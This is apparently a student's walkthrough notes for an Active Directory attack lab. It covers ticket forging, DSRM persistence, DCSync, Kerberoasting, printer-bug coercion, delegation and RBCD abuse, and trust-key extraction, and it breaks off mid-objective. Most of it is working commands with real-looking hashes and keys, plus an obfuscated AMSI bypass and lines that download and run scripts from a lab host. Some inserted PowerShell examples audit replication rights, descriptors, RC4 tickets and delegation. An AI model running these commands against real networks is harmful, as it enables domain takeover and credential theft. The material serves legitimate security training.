C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc

Learning Objective 10

We will use the domain admin privileges obtained earlier to execute a Diamond Ticket attack. We can use Rubeus to execute the attack from cmd (run as admin)

C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then access the DC using winrs from the new spawned process:

winrs -r:dcorp-dc cmd

Learning Objective 11

Using DA privileges obtained earlier to abuse the DSRM credential for persistence. We can do this by opening a remote powershell session, or other tools like SafetyKatz, BetterSafetyKatz, etc.

PS C:\AD\Tools\> $sess = New-PSSession dcorp-dc
PS C:\AD\Tools\> Enter-PSSession -Session $sess
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' + 'IA' +
('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; (
Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
[dcorp-dc]: PS C:\Users\svcadmin\Documents>exit

Then load the Invoke-Mimi script in the session:

Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess

Then we will extract the SAM file from the DC. The Directory Services Restore Mode password is mapped to the local admin on the DC.

Enter-PSSession -Session $sess

Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'

The DSRM admin is not allowed to log on to the DC from the network, so we can change the logon behavior for the account by modifying the registry on the DC as shown:

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Then from our local system we can pass the NTLM hash for the DSRM administrator and access the dc from our new session:

Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

ls \\dcorp-dc.dollarcorp.moneycorp.local\c$

Learning Objective 12

In this objective we will be checking if our user has DCSync (replication) rights. If so, we will execute the DCsync attack to pull hashes and AES keys of krbtgt user, if not, we will add the replication rights for our user and then perform the attack.

We can check if we have replication rights using the following commands, where student520 is the username we want to check

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
. C:\AD\Tools\PowerView.ps1
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} |
?{$_.IdentityName -match "student520"}

If we do not have the rights, we can add the rights by first starting a process as Domain Admin by running the below command from an elevated command prompt:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then run the below commands in the process spawned by rubeus to add the rights:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student520 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Then check for rights again using the previous Get-DomainObjectAcl command, you should be looking for these strings to have AccessAllowed

ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set

ObjectAceType : DS-Replication-Get-Changes

ObjectAceType : DS-Replication-Get-Changes-All
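
The same ACEs are what a defender should review on the domain root. The following added example (not part of the original notes, and not PowerView code) uses only .NET directory classes to list every principal holding the three replication rights, all extended rights, or GenericAll, and drops holders on an expected list; that list and the function name are assumptions to adjust to your own baseline.

```powershell
# Added example: audit who holds the rights DCSync needs on the domain naming context.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Expected holders (assumption; compare against your own known-good baseline).
$ExpectedSids = 'S-1-5-9', 'S-1-5-18', 'S-1-5-32-544'   # Enterprise DCs, SYSTEM, Administrators
$ExpectedRids = '498', '512', '516', '519'              # Ent. RODCs, Domain Admins, DCs, Enterprise Admins

function Get-ReplicationRightHolder {
    param(
        # Distinguished name of the domain root; defaults to the current domain.
        [string]$DomainDN,
        # Include the expected holders in the output as well.
        [switch]$IncludeExpected
    )
    if (-not $DomainDN) {
        $rootDse  = [ADSI]'LDAP://RootDSE'
        $DomainDN = [string]$rootDse.psbase.Properties['defaultNamingContext'].Value
    }
    $entry = [ADSI]"LDAP://$DomainDN"
    $rules = $entry.psbase.ObjectSecurity.GetAccessRules(
        $true, $true, [System.Security.Principal.SecurityIdentifier])

    foreach ($ace in $rules) {
        if ($ace.AccessControlType -ne 'Allow') { continue }

        $mask  = [int]$ace.ActiveDirectoryRights
        $guid  = $ace.ObjectType.ToString()
        $right = $null
        if (($mask -band 0xF01FF) -eq 0xF01FF) {
            $right = 'GenericAll'                       # full control implies replication
        } elseif (($mask -band 0x100) -ne 0) {          # 0x100 = ExtendedRight
            if ($ReplicationRights.ContainsKey($guid)) {
                $right = $ReplicationRights[$guid]
            } elseif ($ace.ObjectType -eq [guid]::Empty) {
                $right = 'All extended rights'          # no GUID means every extended right
            }
        }
        if (-not $right) { continue }

        $sid      = $ace.IdentityReference.Value
        $expected = ($ExpectedSids -contains $sid) -or
                    ($sid -match ('^S-1-5-21-[\d-]+-(' + ($ExpectedRids -join '|') + ')$'))
        if ($expected -and -not $IncludeExpected) { continue }

        # Resolve the SID to a name where possible; orphaned SIDs stay as SIDs.
        try   { $name = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid }

        [pscustomobject]@{
            Principal = $name
            Sid       = $sid
            Right     = $right
            Inherited = $ace.IsInherited
            Expected  = $expected
        }
    }
}

# Anything returned here is a principal outside the baseline that can replicate secrets.
Get-ReplicationRightHolder | Sort-Object Principal, Right | Format-Table -AutoSize
```

After the Add-DomainObjectAcl step above, student520 would appear in this output with all three replication rights and Inherited set to False.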

We can then use SafetyKatz.exe to get the hashes of the krbtgt or any other user, as the DC contains all the user’s secrets in the domain

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Learning Objective 13

In this objective we will be modifying security descriptors on the domain controller to get access using PowerShell remoting and WMI without requiring administrator access. We will retrieve the machine account hash from dcorp-dc without using administrator access and use that to execute a silver ticket attack to get code execution with WMI.

Once we have administrative privileges on a machine, we can modify the security descriptors of services to access the services without admin privileges. The below command (to be run as DA) modifies the host security descriptors for WMI on the DC to allow the student to access WMI

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\RACE.ps1

Set-RemoteWMI -SamAccountName student520 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

Now we can execute WMI queries on the DC as student520

gwmi -class win32_operatingsystem -ComputerName dcorp-dc

Similar modifications can be done to PowerShell remoting configuration:

. C:\AD\Tools\RACE.ps1

Set-RemotePSRemoting -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

And now we can run commands using powershell remoting on the DC without DA privileges

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local

To retrieve machine account hash without DA, first we need to modify permissions on the DC by running this command as DA:

. C:\AD\Tools\RACE.ps1

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student520 -Verbose

Then we can retrieve the hash as the student520 user with

. C:\AD\Tools\RACE.ps1

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

The machine account hash can be used to create silver tickets for HOST and RPCSS to execute WMI queries:

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:1be12164a06b817e834eb437dc8f581c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"



C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Then

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

gwmi -Class win32_operatingsystem -ComputerName dcorp-dc
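
From the defender's side, a per-user grant like the ones above shows up as an extra allow ACE on the endpoint's security descriptor. The following is an added example, not part of the original notes or of RACE: it parses an SDDL string and reports allow ACEs for SIDs outside an expected list. The function name, the expected-SID list and both sample descriptors (including the account SID) are constructed assumptions.

```powershell
# Added example: report allow ACEs for trustees that are not on an expected list.
# The expected list is an assumption; replace it with your own known-good baseline.
$ExpectedSids = @(
    'S-1-5-32-544'   # BUILTIN\Administrators
    'S-1-5-32-580'   # BUILTIN\Remote Management Users
    'S-1-5-4'        # NT AUTHORITY\INTERACTIVE
)

function Get-UnexpectedAllowAce {
    param(
        [Parameter(Mandatory)] [string]   $Sddl,
        [Parameter(Mandatory)] [string[]] $ExpectedSid
    )
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs widen access; deny and audit ACEs are skipped.
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if ($sid -in $ExpectedSid) { continue }
        [pscustomobject]@{
            Sid          = $sid
            AccessMask   = '0x{0:X8}' -f $ace.AccessMask
            # S-1-5-21-* identifies an individual domain or local account or group,
            # which is unusual on an endpoint descriptor that normally lists built-ins.
            IsAccountSid = $sid -like 'S-1-5-21-*'
        }
    }
}

# Constructed descriptors: a baseline, and the same descriptor with one extra
# full-control ACE for a single account (constructed SID).
$baseline = 'O:NSG:BAD:P(A;;GA;;;S-1-5-32-544)(A;;GA;;;S-1-5-32-580)(A;;GA;;;S-1-5-4)'
$modified = $baseline + '(A;;GA;;;S-1-5-21-1111111111-2222222222-3333333333-1104)'

# On a live host the PowerShell remoting descriptor can be read with:
#   (Get-PSSessionConfiguration -Name Microsoft.PowerShell).SecurityDescriptorSddl
Get-UnexpectedAllowAce -Sddl $baseline -ExpectedSid $ExpectedSids
Get-UnexpectedAllowAce -Sddl $modified -ExpectedSid $ExpectedSids | Format-Table -AutoSize
```

Running the check on a schedule against a stored known-good SDDL turns a silent descriptor change into a reviewable difference.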

Learning Objective 14

The task in this objective is to use Kerberoasting to get and crack the password of the SQL server service account.

We can use PowerView’s Get-DomainUser -SPN or the AD module to discover services running under user accounts, since services running under machine accounts have difficult passwords.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainUser -SPN

This shows that, in this lab, svcadmin, who is a DA, has an SPN set which we can Kerberoast with Rubeus. Note that we are using the /rc4opsec option, which will only retrieve hashes for accounts that support RC4. If the account supports Kerberos AES 128/256-bit encryption, the below command will not request its hashes.

C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

Then you need to remove :1433 from the SPN in hashes.txt (output file of previous command) before running john, then run the below command to crack it.

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
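
The detection counterpart to the RC4 ticket request above, as an added example that is not part of the original notes: it filters records shaped like Security event 4769 for RC4 (0x17) service tickets issued for user-account services and groups them by requester. The function name, the threshold and every sample record are constructed assumptions.

```powershell
# Constructed records shaped like Security event 4769 (Kerberos service ticket requested).
# Field names follow the event's EventData; none of this is real log data.
$sample4769 = @(
    [pscustomobject]@{ Time='09:00:01'; TargetUserName='student520@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName='svcadmin';     TicketEncryptionType='0x17'; IpAddress='::ffff:192.0.2.20' }
    [pscustomobject]@{ Time='09:00:02'; TargetUserName='student520@DOLLARCORP.MONEYCORP.LOCAL'; ServiceName='websvc';       TicketEncryptionType='0x17'; IpAddress='::ffff:192.0.2.20' }
    [pscustomobject]@{ Time='09:01:10'; TargetUserName='appadmin@DOLLARCORP.MONEYCORP.LOCAL';   ServiceName='DCORP-MSSQL$'; TicketEncryptionType='0x12'; IpAddress='::ffff:192.0.2.31' }
    [pscustomobject]@{ Time='09:01:15'; TargetUserName='appadmin@DOLLARCORP.MONEYCORP.LOCAL';   ServiceName='krbtgt';       TicketEncryptionType='0x12'; IpAddress='::ffff:192.0.2.31' }
    [pscustomobject]@{ Time='09:02:40'; TargetUserName='srvadmin@DOLLARCORP.MONEYCORP.LOCAL';   ServiceName='sqlreportsvc'; TicketEncryptionType='0x12'; IpAddress='::ffff:192.0.2.32' }
)

function Find-Rc4ServiceTicket {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        # Distinct RC4-requested services per requester that counts as bulk (assumed value).
        [int] $DistinctServiceThreshold = 2
    )
    $rc4 = foreach ($e in $Events) {
        # The field is rendered as a hex string such as 0x17 (RC4-HMAC) or 0x12 (AES256).
        $etype = [Convert]::ToInt32([string]$e.TicketEncryptionType, 16)
        if ($etype -ne 0x17) { continue }
        # Machine accounts end in $ and have long random passwords; krbtgt is not a roastable service.
        if ($e.ServiceName -eq 'krbtgt' -or $e.ServiceName.EndsWith('$')) { continue }
        $e
    }
    if (-not $rc4) { return }

    $rc4 | Group-Object TargetUserName | ForEach-Object {
        $services = @($_.Group.ServiceName | Sort-Object -Unique)
        [pscustomobject]@{
            Requester   = $_.Name
            Rc4Requests = $_.Count
            Services    = $services -join ', '
            Sources     = @($_.Group.IpAddress | Sort-Object -Unique) -join ', '
            Bulk        = $services.Count -ge $DistinctServiceThreshold
        }
    }
}

# On a DC the input would come from the Security log (event ID 4769) after
# mapping each event's EventData fields onto the property names used above.
Find-Rc4ServiceTicket -Events $sample4769 | Format-List
```

Because /rc4opsec skips accounts that support AES, enabling AES on service accounts and giving them long random passwords (or moving them to managed service accounts) removes them from this kind of request, and any remaining RC4 ticket for them stands out.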

Learning Objective 15

Objectives: find a server in the dcorp domain where unconstrained delegation is enabled, compromise the server and escalate to DA, escalate to EA by abusing the printer bug.

First we will need to find a server that has unconstrained delegation enabled

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name

Since the prerequisite for elevation using unconstrained delegation is having admin access to the machine, we need to compromise a user who has local admin access on appsrv. Recall that we extracted the secrets of appadmin, srvadmin, and websvc from dcorp-adminsrv. Let’s check if any of them have local admin on dcorp-appsrv. Run the below command from an elevated command prompt:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit"

Then run the below commands in the new process:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

And we can see that we have remote local admin access on dcorp-appsrv and dcorp-adminsrv with the appadmin user. We can copy rubeus to the dcorp-appsrv to abuse the printer bug. Run the below from the process running as appadmin:

echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Y

Then run rubeus in Listener mode

winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

On our student VM, use MS-RPRN to force authentication from the dc

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, you should see the TGT of dcorp-dc$. Copy the base64 encoded ticket and use it with Rubeus on the student VM. Run the below command from an elevated shell, as the SafetyKatz command we will use requires elevation.

C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx

Now we can run DCSync from this process:

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Escalation to Enterprise Admin

To get EA privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on the dcorp-appsrv

winrs -r:dcorp-appsrv cmd

C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Then use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv

C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

As previously, copy the base64 encoded ticket and use it with Rubeus on the student VM in an elevated shell.

C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx...

Now we can run DCSync from the process with

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

And we can escalate to EA!

Learning Objective 16

In this objective we will be enumerating users in the domain for whom constrained delegation is enabled, and for such a user we will request a TGT from the DC and obtain a TGS for the service to which delegation is configured, then we will pass the ticket and access the service. In this objective we will also enumerate computer accounts for which constrained delegation is enabled, and request a TGT from the DC, and use the TGS for LDAP service on the target machine, then use the TGS to execute dcsync attack.

To enumerate users with constrained delegation, we can use PowerView. Run the below commands to get started after loading a shell with Invisi-Shell:

. C:\AD\Tools\PowerView.ps1

Get-DomainUser -TrustedToAuth

Since we already have the secrets for websvc from the dcorp-adminsrv machine, we can use kekeo or rubeus to abuse that as such:

C:\AD\Tools\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

This command requests a TGS for websvc as the DA, then the TGS is used to access the service specified in the /msdsspn parameter (CIFS/dcorp-mssql is the filesystem on the dcorp-mssql machine).

Check the ticket with klist, and you should see Client: Administrator @ dollarcorp.moneycorp.local. If so, try accessing the filesystem on dcorp-mssql with

dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Abusing Constrained Delegation with Kekeo

Go into the x64 kekeo directory, and we will use the tgt::ask module from kekeo to request a TGT for websvc. We are using the NTLM hash just to show that NTLM can be used as well.

PS C:\AD\Tools\kekeo\x64> .\kekeo.exe

tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f

Now let’s get this TGT and request a TGS, note that we are requesting a TGS to access cifs/dcorp-mssql as the domain administrator.

tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

You should see

> Ticket in file 'TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi'

Next, inject the ticket in the current session to use it as such:

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Then use the below command to view the contents of the fileshare on dcorp-mssql

dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Enumerating computer accounts with constrained delegation enabled using PowerView

Get-DomainComputer -TrustedtoAuth

Run the below command with the AES key of dcorp-adminsrv from an elevated command prompt.

C:\AD\Tools\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:1f556f9d4e5fcab7f1bf4730180eb1efd0fadd5bb1b5c1e810149f9016a7284d /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt

Then run the below command to abuse the LDAP ticket

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Abusing Constrained Delegation for Machine Accounts using Kekeo

.\kekeo.exe

tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d

Since there is no SNAME validation, we can request TGS for time and also LDAP service on dcorp-dc as domain administrator as such:

tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

Then we can use the LDAP ticket as such:

. Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'

Now using this TGS, we can run DCSync from Mimikatz without DA privileges:

Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Learning Objective 17

In this objective, we will be finding a computer in the dcorp domain where we have write permissions, then abuse those write permissions to access that computer as DA. We can use PowerView after running Invisi-Shell to enumerate write permissions for a user that we have compromised. We can try this for multiple users or use BloodHound, and we would know that ciadmin has write permissions on the computer object of dcorp-mgmt:

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

Recall that we compromised ciadmin from dcorp-ci. We can use either the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci. We can use the reverse shell and load powerview on there. Once on the reverse shell as ciadmin on dcorp-ci:

iex (iwr http://172.16.100.20/sbloggingbypass.txt -UseBasicParsing)

 S`eT-It`em ( 'V'+'aR'
+ 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) )
; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.20/PowerView.ps1'))

Now, we set RBCD on dcorp-mgmt for the student VMs in the reverse shell as such:

Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std520$' -Verbose

and check that it is set correctly with

Get-DomainRBCD

which should spit out some output showing the sourcename dcorp-mgmt and delegatedname dcorp-std520$

From the student VM in an elevated shell, we will get the AES keys using Loader.exe to load SafetyKatz and execute it in memory, then grab the aes256 hmac

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::ekeys" "exit"

Then, we can use Rubeus to abuse RBCD to access dcorp-mgmt as DA

C:\AD\Tools\Rubeus.exe s4u /user:dcorp-std520$ /aes256:04ec575508fbff957465d31785a6de50d7b3e24a808dc65365f81323d23a11e0 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Then check if we can access dcorp-mgmt with

winrs -r:dcorp-mgmt cmd

whoami
hostname
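
Learning Objectives 15 to 17 each depend on a delegation setting that can be audited from directory attributes. The following is an added example, not part of the original notes: it classifies accounts by unconstrained delegation, constrained delegation and RBCD, and flags privileged accounts that can still be delegated. The function names are hypothetical, and the account records are a constructed snapshot that reuses host names from these notes with illustrative attribute values.

```powershell
# userAccountControl bits relevant to delegation.
$UacFlag = @{
    ServerTrustAccount         = 0x2000     # domain controller
    TrustedForDelegation       = 0x80000    # unconstrained delegation
    NotDelegated               = 0x100000   # "Account is sensitive and cannot be delegated"
    TrustedToAuthForDelegation = 0x1000000  # protocol transition allowed
}

function New-Finding($Account, $Type, $Detail) {
    [pscustomobject]@{ Account = $Account; Type = $Type; Detail = $Detail }
}

function Get-DelegationFinding {
    param(
        [Parameter(Mandatory)] [object[]] $Accounts,
        [string[]] $DomainControllers = @()
    )
    foreach ($a in $Accounts) {
        $uac  = [int]$a.UserAccountControl
        $isDc = [bool]($uac -band $UacFlag.ServerTrustAccount)

        # DCs carry this flag by design; any other host holding it is the finding.
        if (($uac -band $UacFlag.TrustedForDelegation) -and -not $isDc) {
            New-Finding $a.Name 'Unconstrained' 'Receives the TGT of accounts that authenticate to it'
        }
        foreach ($spn in @($a.AllowedToDelegateTo | Where-Object { $_ })) {
            # Reduce service/host.domain:port to the short host name.
            $targetHost = (($spn -split '/')[1] -replace ':\d+$') -split '\.' | Select-Object -First 1
            $detail = "May delegate to $spn"
            if ($uac -band $UacFlag.TrustedToAuthForDelegation) { $detail += ' with protocol transition' }
            if ($targetHost -in $DomainControllers) {
                # The service class is not validated, so time/<dc> also reaches ldap/<dc>.
                $detail += '; target is a DC and the service class is not binding'
            }
            New-Finding $a.Name 'Constrained' $detail
        }
        foreach ($p in @($a.ActOnBehalfOf | Where-Object { $_ })) {
            New-Finding $a.Name 'RBCD' "$p may impersonate users to this host"
        }
        if ($a.Privileged -and -not ($uac -band $UacFlag.NotDelegated)) {
            New-Finding $a.Name 'DelegablePrivileged' 'Privileged account is not marked sensitive'
        }
    }
}

# Constructed snapshot. In a live domain these values come from userAccountControl,
# msDS-AllowedToDelegateTo and msDS-AllowedToActOnBehalfOfOtherIdentity.
$accounts = @(
    [pscustomobject]@{ Name='dcorp-dc$';       UserAccountControl=0x82000;   AllowedToDelegateTo=@(); ActOnBehalfOf=@(); Privileged=$false }
    [pscustomobject]@{ Name='dcorp-appsrv$';   UserAccountControl=0x81000;   AllowedToDelegateTo=@(); ActOnBehalfOf=@(); Privileged=$false }
    [pscustomobject]@{ Name='websvc';          UserAccountControl=0x1000200; AllowedToDelegateTo=@('CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'); ActOnBehalfOf=@(); Privileged=$false }
    [pscustomobject]@{ Name='dcorp-adminsrv$'; UserAccountControl=0x1001000; AllowedToDelegateTo=@('time/dcorp-dc.dollarcorp.moneycorp.LOCAL');    ActOnBehalfOf=@(); Privileged=$false }
    [pscustomobject]@{ Name='dcorp-mgmt$';     UserAccountControl=0x1000;    AllowedToDelegateTo=@(); ActOnBehalfOf=@('dcorp-std520$'); Privileged=$false }
    [pscustomobject]@{ Name='Administrator';   UserAccountControl=0x200;     AllowedToDelegateTo=@(); ActOnBehalfOf=@(); Privileged=$true }
)

Get-DelegationFinding -Accounts $accounts -DomainControllers 'dcorp-dc' | Format-Table -AutoSize -Wrap
```

Marking privileged accounts as sensitive (or adding them to Protected Users) and restricting who can write to computer objects addresses the last two finding types directly.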

Learning Objective 18

Using DA access to dollarcorp.moneycorp.local, escalate privileges to EA or DA to the parent domain, moneycorp.local using the domain trust key. We can retrieve the trust key between dollarcorp and moneycorp using mimikatz or safetykatz. Start a process with DA privileges by running the below command from an elevated prompt:

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Then use the below commands from the process running as DA to copy loader.exe on dcorp-dc and use it to extract credentials

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-dc cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.20

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

lsadump::trust /patch

In this case the aes256 hmac for the dollarcorp.moneycorp.local to moneycorp.local trust is 556d040b71b7fc20aa043027b19a3dafc6dbffdb7968966e66200c3f5683e56a and the rc4 is f7277dcaf640d00ddd2744143b346c36

We will use it to forge a ticket with the SID history of EA admins by running the below command from an elevated command prompt on the student VM

